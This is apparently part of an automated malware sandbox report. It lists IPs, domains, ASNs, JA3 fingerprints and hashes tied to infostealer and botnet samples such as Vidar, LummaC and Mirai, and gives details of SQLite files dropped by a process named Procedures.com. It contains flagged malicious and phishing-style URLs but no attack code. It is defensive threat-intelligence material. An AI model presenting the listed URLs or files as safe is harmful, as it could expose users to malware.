                                                                                                                                                                                                                                                                            file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                                                                                                                                                                                                                              149.154.167.99http://xn--r1a.website/s/ogorodruGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                              • telegram.org/img/favicon.ico
                                                                                                                                                                                                                                                                              http://cryptorabotakzz.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                              • telegram.org/
                                                                                                                                                                                                                                                                              http://cache.netflix.com.id1.wuush.us.kg/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                              • telegram.org/dl?tme=fe3233c08ff79d4814_5062105595184761217
                                                                                                                                                                                                                                                                              http://investors.spotify.com.sg2.wuush.us.kg/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                              • telegram.org/
                                                                                                                                                                                                                                                                              http://bekaaviator.kz/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                              • telegram.org/
                                                                                                                                                                                                                                                                              http://telegramtw1.org/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                              • telegram.org/?setln=pl
                                                                                                                                                                                                                                                                              http://makkko.kz/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                              • telegram.org/
                                                                                                                                                                                                                                                                              http://telegram.dogGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                              • telegram.dog/
                                                                                                                                                                                                                                                                              LnSNtO8JIa.exeGet hashmaliciousCinoshi StealerBrowse
                                                                                                                                                                                                                                                                              • t.me/cinoshibot
                                                                                                                                                                                                                                                                              jtfCFDmLdX.exeGet hashmaliciousGurcu Stealer, PrivateLoader, RedLine, RisePro Stealer, SmokeLoader, zgRATBrowse
                                                                                                                                                                                                                                                                              • t.me/cinoshibot

                                                                                                                                                                                                                                                                              Domains

                                                                                                                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                                              toptek.sbs9EI7wrGs4K.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                              • 94.130.188.57
                                                                                                                                                                                                                                                                              AmsterdamCryptoLTD.exeGet hashmaliciousLummaC, DarkComet, LummaC Stealer, VidarBrowse
                                                                                                                                                                                                                                                                              • 94.130.188.57
                                                                                                                                                                                                                                                                              GoldenContinent.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                              • 94.130.188.57
                                                                                                                                                                                                                                                                              file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                              • 94.130.188.57
                                                                                                                                                                                                                                                                              file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, XmrigBrowse
                                                                                                                                                                                                                                                                              • 94.130.188.57
                                                                                                                                                                                                                                                                              t.me9EI7wrGs4K.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                              • 149.154.167.99
                                                                                                                                                                                                                                                                              AmsterdamCryptoLTD.exeGet hashmaliciousLummaC, DarkComet, LummaC Stealer, VidarBrowse
                                                                                                                                                                                                                                                                              • 149.154.167.99
                                                                                                                                                                                                                                                                              GoldenContinent.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                              • 149.154.167.99
                                                                                                                                                                                                                                                                              file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                              • 149.154.167.99
                                                                                                                                                                                                                                                                              file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, XmrigBrowse
                                                                                                                                                                                                                                                                              • 149.154.167.99
                                                                                                                                                                                                                                                                              file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, XmrigBrowse
                                                                                                                                                                                                                                                                              • 149.154.167.99
                                                                                                                                                                                                                                                                              file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Vidar, XmrigBrowse
                                                                                                                                                                                                                                                                              • 149.154.167.99
                                                                                                                                                                                                                                                                              file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, XmrigBrowse
                                                                                                                                                                                                                                                                              • 149.154.167.99
                                                                                                                                                                                                                                                                              https://l.facebook.com/l.php?u=https%3A%2F%2Ft.me%2FPAWSOG_bot%2FPAWS%3Fstartapp%3Dy6XarDUx%26fbclid%3DIwZXh0bgNhZW0CMTAAAR3IsDSVMcBgD-KKIyBXkOWfUkEFRcacr_vOCRRmviPmkFBUb89K461Xors_aem_phLdcKrpf4KWQzIltAO6sg&h=AT0WVJB1xqSKqrvz6oCyiCr2S_kisddMHHYmkei4Ws2sbL4pRphOmNE4PXT0dksI9PktkcW4m87_ll8cIS3t1M10038szd68S2XeJYojq6dQAb2PNvHsZFU9AcnVKku-Ww&__tn__=R%5D-R&c%5B0%5D=AT333mRdaoK-Yj4Ygf4lXueSR8jJ8CACMU4jPPhyx4Dd8BU65ez-7IWN-rjEtxmQ4vnelW50DVCFSTPJgFIJWEEx8TitUX4wIVY-t-NciHl77nL94VWL9IfsUrTxvCQB2zyPBhLoYnhspB5Xwyppb4fz5drOP91P-bJPoqSIEG9eoaQFOXaOYJeNVBj8A6jTCbgB-MXs3Mr2iqYLeO7DnF-q9v0FShLlwJK2Dtzfkv1OxBm45LKEAXAPoI199zlXmZpVMznjGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                              • 149.154.167.99
                                                                                                                                                                                                                                                                              ktyihkdfesf.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                              • 149.154.167.99
                                                                                                                                                                                                                                                                              chrome.cloudflare-dns.comLoader.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                              • 162.159.61.3
                                                                                                                                                                                                                                                                              file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Vidar, XmrigBrowse
                                                                                                                                                                                                                                                                              • 172.64.41.3
                                                                                                                                                                                                                                                                              MS100384UTC.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                              • 162.159.61.3
                                                                                                                                                                                                                                                                              SWIFT.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                              • 162.159.61.3
                                                                                                                                                                                                                                                                              Ocean-T2I4I8O9.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                              • 162.159.61.3
                                                                                                                                                                                                                                                                              ktyihkdfesf.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                              • 172.64.41.3
                                                                                                                                                                                                                                                                              pjthjsdjgjrtavv.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                              • 162.159.61.3
                                                                                                                                                                                                                                                                              invoice.docmGet hashmaliciousMetasploitBrowse
                                                                                                                                                                                                                                                                              • 162.159.61.3
                                                                                                                                                                                                                                                                              ep_setup.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                              • 162.159.61.3
                                                                                                                                                                                                                                                                              file.exeGet hashmaliciousScreenConnect Tool, LummaC, Amadey, Cryptbot, LummaC Stealer, VidarBrowse
                                                                                                                                                                                                                                                                              • 172.64.41.3
                                                                                                                                                                                                                                                                              ssl.bingadsedgeextension-prod-europe.azurewebsites.netfile.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Vidar, XmrigBrowse
                                                                                                                                                                                                                                                                              • 94.245.104.56
                                                                                                                                                                                                                                                                              ktyihkdfesf.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                              • 94.245.104.56
                                                                                                                                                                                                                                                                              pjthjsdjgjrtavv.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                              • 94.245.104.56
                                                                                                                                                                                                                                                                              file.exeGet hashmaliciousScreenConnect Tool, LummaC, Amadey, Cryptbot, LummaC Stealer, VidarBrowse
                                                                                                                                                                                                                                                                              • 94.245.104.56
                                                                                                                                                                                                                                                                              QhR8Zp6fZs.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                              • 94.245.104.56
                                                                                                                                                                                                                                                                              CNUXJvLcgw.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                              • 94.245.104.56
                                                                                                                                                                                                                                                                              xWpAZpLw47.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                              • 94.245.104.56
                                                                                                                                                                                                                                                                              pM3fQBuTLy.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                              • 94.245.104.56
                                                                                                                                                                                                                                                                              QIo3SytSZA.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                              • 94.245.104.56
                                                                                                                                                                                                                                                                              R4qP4YM0QX.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                              • 94.245.104.56

                                                                                                                                                                                                                                                                              ASNs

                                                                                                                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                                              TELEGRAMRU9EI7wrGs4K.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                              • 149.154.167.99
                                                                                                                                                                                                                                                                              tg.exeGet hashmaliciousBabadedaBrowse
                                                                                                                                                                                                                                                                              • 149.154.167.220
                                                                                                                                                                                                                                                                              tg.exeGet hashmaliciousBabadedaBrowse
                                                                                                                                                                                                                                                                              • 149.154.167.220
                                                                                                                                                                                                                                                                              setup.exeGet hashmaliciousBabadedaBrowse
                                                                                                                                                                                                                                                                              • 149.154.167.220
                                                                                                                                                                                                                                                                              AmsterdamCryptoLTD.exeGet hashmaliciousLummaC, DarkComet, LummaC Stealer, VidarBrowse
                                                                                                                                                                                                                                                                              • 149.154.167.99
                                                                                                                                                                                                                                                                              GoldenContinent.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                              • 149.154.167.99
                                                                                                                                                                                                                                                                              file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                                                                                                                                                                                              • 149.154.167.220
                                                                                                                                                                                                                                                                              file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                              • 149.154.167.99
                                                                                                                                                                                                                                                                              user.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                              • 149.154.167.220
                                                                                                                                                                                                                                                                              file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, XmrigBrowse
                                                                                                                                                                                                                                                                              • 149.154.167.220
                                                                                                                                                                                                                                                                              AKAMAI-ASN1EUNeverlose.cc.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                              • 23.55.153.106
                                                                                                                                                                                                                                                                              Launcher_x64.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                              • 23.55.153.106
                                                                                                                                                                                                                                                                              WonderHack.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                              • 23.55.153.106
                                                                                                                                                                                                                                                                              Launcher.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                              • 23.55.153.106
                                                                                                                                                                                                                                                                              Wave-Executor.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                              • 23.55.153.106
                                                                                                                                                                                                                                                                              2.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                              • 172.237.152.235
                                                                                                                                                                                                                                                                              mips.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                                                                                                                                              • 23.211.121.53
                                                                                                                                                                                                                                                                              nshkarm7.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                                              • 172.233.106.253
                                                                                                                                                                                                                                                                              nsharm7.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                                              • 172.227.252.37
                                                                                                                                                                                                                                                                              arm5.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                                                                                                                                              • 23.215.103.199
                                                                                                                                                                                                                                                                              AMAZON-02UShttps://clicks.icims.com/f/a/5aA63l6Vdy8mmO6SfnFRFQ~~/AAIB5gA~/RgRpSzdjP0SjaHR0cHM6Ly9sb2dpbi5pY2ltcy5jb20vdS9yZXNldC12ZXJpZnk_dGlja2V0PVYzbldUZVAzTUxqc0hwVzlXOFlZbFhxamh5SFJZR0tHI2NsaWVudElkPUtKQTk1RHhIT1BOTzU2VWFOUmRSWTU3cHpuNkNNSGNtJmNsaWVudE5hbWU9QXBwbGljYW50IFRyYWNraW5nJmNhbGxiYWNrVXJsPVcDc3BjQgpnZWOyaGeuoGU9UhltaWthLnlhbWFndWNoaUBoYXlzLmNvLmpwWAQAABLwGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                              • 65.9.112.70
                                                                                                                                                                                                                                                                              https://staging.effimate.toyo.ai-powered-services.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                              • 108.158.71.175
                                                                                                                                                                                                                                                                              loligang.sh4.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                                              • 64.252.106.176
                                                                                                                                                                                                                                                                              loligang.mpsl.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                                              • 54.122.130.248
                                                                                                                                                                                                                                                                              loligang.ppc.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                                              • 54.96.126.18
                                                                                                                                                                                                                                                                              loligang.mips.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                                              • 13.247.83.253
                                                                                                                                                                                                                                                                              hidakibest.ppc.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                                                                                                                                                                                                              • 34.249.145.219
                                                                                                                                                                                                                                                                              hidakibest.arm7.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                                                                                                                                                                                                              • 54.171.230.55
                                                                                                                                                                                                                                                                              hidakibest.arm6.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                                                                                                                                                                                                              • 34.249.145.219
                                                                                                                                                                                                                                                                              Space.x86.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                                              • 54.171.230.55
                                                                                                                                                                                                                                                                              CLOUDFLARENETUSfKdiT1D1dk.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                              • 104.16.249.249
                                                                                                                                                                                                                                                                              fKdiT1D1dk.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                              • 104.16.248.249
                                                                                                                                                                                                                                                                              https://clicks.icims.com/f/a/5aA63l6Vdy8mmO6SfnFRFQ~~/AAIB5gA~/RgRpSzdjP0SjaHR0cHM6Ly9sb2dpbi5pY2ltcy5jb20vdS9yZXNldC12ZXJpZnk_dGlja2V0PVYzbldUZVAzTUxqc0hwVzlXOFlZbFhxamh5SFJZR0tHI2NsaWVudElkPUtKQTk1RHhIT1BOTzU2VWFOUmRSWTU3cHpuNkNNSGNtJmNsaWVudE5hbWU9QXBwbGljYW50IFRyYWNraW5nJmNhbGxiYWNrVXJsPVcDc3BjQgpnZWOyaGeuoGU9UhltaWthLnlhbWFndWNoaUBoYXlzLmNvLmpwWAQAABLwGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                              • 162.247.243.29
                                                                                                                                                                                                                                                                              http://217.28.130.10/8265/568747470733a2f2f6d61696c2d6864656c2e6c7664642e696e666f2f3f656d61696c3d62722e73756e67406864656c2e636f2e6b72Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                              • 172.67.191.167
                                                                                                                                                                                                                                                                              Echelon.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                                                              • 172.67.154.166
                                                                                                                                                                                                                                                                              Neverlose.cc.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                              • 172.67.157.254
                                                                                                                                                                                                                                                                              setup.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                              • 104.21.65.145
                                                                                                                                                                                                                                                                              bas.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                              • 104.21.71.155
                                                                                                                                                                                                                                                                              Wine.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                              • 104.21.50.161
                                                                                                                                                                                                                                                                              tg.exeGet hashmaliciousBabadedaBrowse
                                                                                                                                                                                                                                                                              • 172.67.74.152

                                                                                                                                                                                                                                                                              JA3 Fingerprints

                                                                                                                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                                              37f463bf4616ecd445d4a1937da06e199EI7wrGs4K.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                              • 94.130.188.57
                                                                                                                                                                                                                                                                              • 149.154.167.99
                                                                                                                                                                                                                                                                              setup.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                              • 94.130.188.57
                                                                                                                                                                                                                                                                              • 149.154.167.99
                                                                                                                                                                                                                                                                              Setup.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                              • 94.130.188.57
                                                                                                                                                                                                                                                                              • 149.154.167.99
                                                                                                                                                                                                                                                                              Setup.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                              • 94.130.188.57
                                                                                                                                                                                                                                                                              • 149.154.167.99
                                                                                                                                                                                                                                                                              AmsterdamCryptoLTD.exeGet hashmaliciousLummaC, DarkComet, LummaC Stealer, VidarBrowse
                                                                                                                                                                                                                                                                              • 94.130.188.57
                                                                                                                                                                                                                                                                              • 149.154.167.99
                                                                                                                                                                                                                                                                              installer.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                              • 94.130.188.57
                                                                                                                                                                                                                                                                              • 149.154.167.99
                                                                                                                                                                                                                                                                              GoldenContinent.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                              • 94.130.188.57
                                                                                                                                                                                                                                                                              • 149.154.167.99
                                                                                                                                                                                                                                                                              file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                                                                                                                                                                                              • 94.130.188.57
                                                                                                                                                                                                                                                                              • 149.154.167.99
                                                                                                                                                                                                                                                                              file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                              • 94.130.188.57
                                                                                                                                                                                                                                                                              • 149.154.167.99

                                                                                                                                                                                                                                                                              Dropped Files

                                                                                                                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\139308\Procedures.com9EI7wrGs4K.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                                Wine.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                                  Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                                    GoldenContinent.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                                      file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                                        Full-Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                                          Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                                            Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                                                                              Full-Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                                                                                file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, XmrigBrowse

                                                                                                                                                                                                                                                                                                  Created / dropped Files

                                                                                                                                                                                                                                                                                                  C:\ProgramData\DJMYU3ECBA1N\37QQIE

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\139308\Procedures.com
                                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):159744
                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.5394293526345721
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:96:AquejzH+bF+UIYysX0IxQzh/tsV0NifLjLqLy0e9S8E:AqtH+bF+UI3iN0RSV0k3qLyj9
                                                                                                                                                                                                                                                                                                  MD5:52701A76A821CDDBC23FB25C3FCA4968
                                                                                                                                                                                                                                                                                                  SHA1:440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE
                                                                                                                                                                                                                                                                                                  SHA-256:D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
                                                                                                                                                                                                                                                                                                  SHA-512:2653C8DB9C20207FA7006BC9C63142B7C356FB9DC97F9184D60C75D987DC0848A8159C239E83E2FC9D45C522FEAE8D273CDCD31183DED91B8B587596183FC000
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                  C:\ProgramData\DJMYU3ECBA1N\3E3OP8QIM

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\139308\Procedures.com
                                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):51200
                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.8746135976761988
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                                                                                                                                                                                                                                                  MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                                                                                                                                                                                                                                                  SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                                                                                                                                                                                                                                                  SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                                                                                                                                                                                                                                                  SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                  C:\ProgramData\DJMYU3ECBA1N\6XTRIW

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\139308\Procedures.com
                                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 32768, file counter 2, database pages 9, cookie 0x6, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):294912
                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.08438200565341271
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:192:5va0zkVmvQhyn+Zoz679fqlQbGhMHPaVAL23v4U:51zkVmvQhyn+Zoz67NU
                                                                                                                                                                                                                                                                                                  MD5:F7EEE7B0D281E250D1D8E36486F5A2C3
                                                                                                                                                                                                                                                                                                  SHA1:309736A27E794672BD1BDFBAC69B2C6734FC25CE
                                                                                                                                                                                                                                                                                                  SHA-256:378DD46FE8A8AAC2C430AE8A7C5C1DC3C2A343534A64A263EC9A4F1CE801985E
                                                                                                                                                                                                                                                                                                  SHA-512:CE102A41CA4E2A27CCB27F415D2D69A75A0058BA0F600C23F63B89F30FFC982BA48336140714C522B46CC6D13EDACCE3DF0D6685D02844B8DB0AD3378DB9CABB
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j......z<.{...{.{a{.z.z<z.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                  C:\ProgramData\DJMYU3ECBA1N\DJWL6P

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\139308\Procedures.com
                                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 10, database pages 91, cookie 0x36, schema 4, UTF-8, version-valid-for 10
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):196608
                                                                                                                                                                                                                                                                                                  Entropy (8bit):1.2651197155152976
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:384:8/2qOB1nxCkMzSAELyKOMq+8yC8F/YfU5m+OlTLVuma:Bq+n0Jz9ELyKOMq+8y9/OwV
                                                                                                                                                                                                                                                                                                  MD5:189E622A20539385406A4E2B93D77FEA
                                                                                                                                                                                                                                                                                                  SHA1:C767A9909D2B01EEEC30C661953446F81989C53E
                                                                                                                                                                                                                                                                                                  SHA-256:073F92A88850AA2C355B28011592202C2CD367D99CB152BCB31A0D4FD361D458
                                                                                                                                                                                                                                                                                                  SHA-512:9F975FFBC2A834D827D7F46CA0863ABB9A785D639C47BD56BE8072B958FD365DF78EA1F9DB649A96C8F65A0FA4E844E41169E00909C31D17625889DF44FD1C3F
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:SQLite format 3......@ .......[...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                  C:\ProgramData\DJMYU3ECBA1N\EKNYUS

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\139308\Procedures.com
                                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):98304
                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.08235737944063153
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                                                                                                                                                                                                                                  MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                                                                                                                                                                                                                                  SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                                                                                                                                                                                                                                  SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                                                                                                                                                                                                                                  SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                  C:\ProgramData\DJMYU3ECBA1N\FCTR1D

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\139308\Procedures.com
                                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):155648
                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.5407252242845243
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:96:OgWyejzH+bDoYysX0IxQzZkHtpVJNlYDLjGQLBE3CeE0kE:OJhH+bDo3iN0Z2TVJkXBBE3yb
                                                                                                                                                                                                                                                                                                  MD5:7B955D976803304F2C0505431A0CF1CF
                                                                                                                                                                                                                                                                                                  SHA1:E29070081B18DA0EF9D98D4389091962E3D37216
                                                                                                                                                                                                                                                                                                  SHA-256:987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
                                                                                                                                                                                                                                                                                                  SHA-512:CE2F1709F39683BE4131125BED409103F5EDF1DED545649B186845817C0D69E3D0B832B236F7C4FC09AB7F7BB88E7C9F1E4F7047D1AF56D429752D4D8CBED47A
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:SQLite format 3......@ .......&..................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

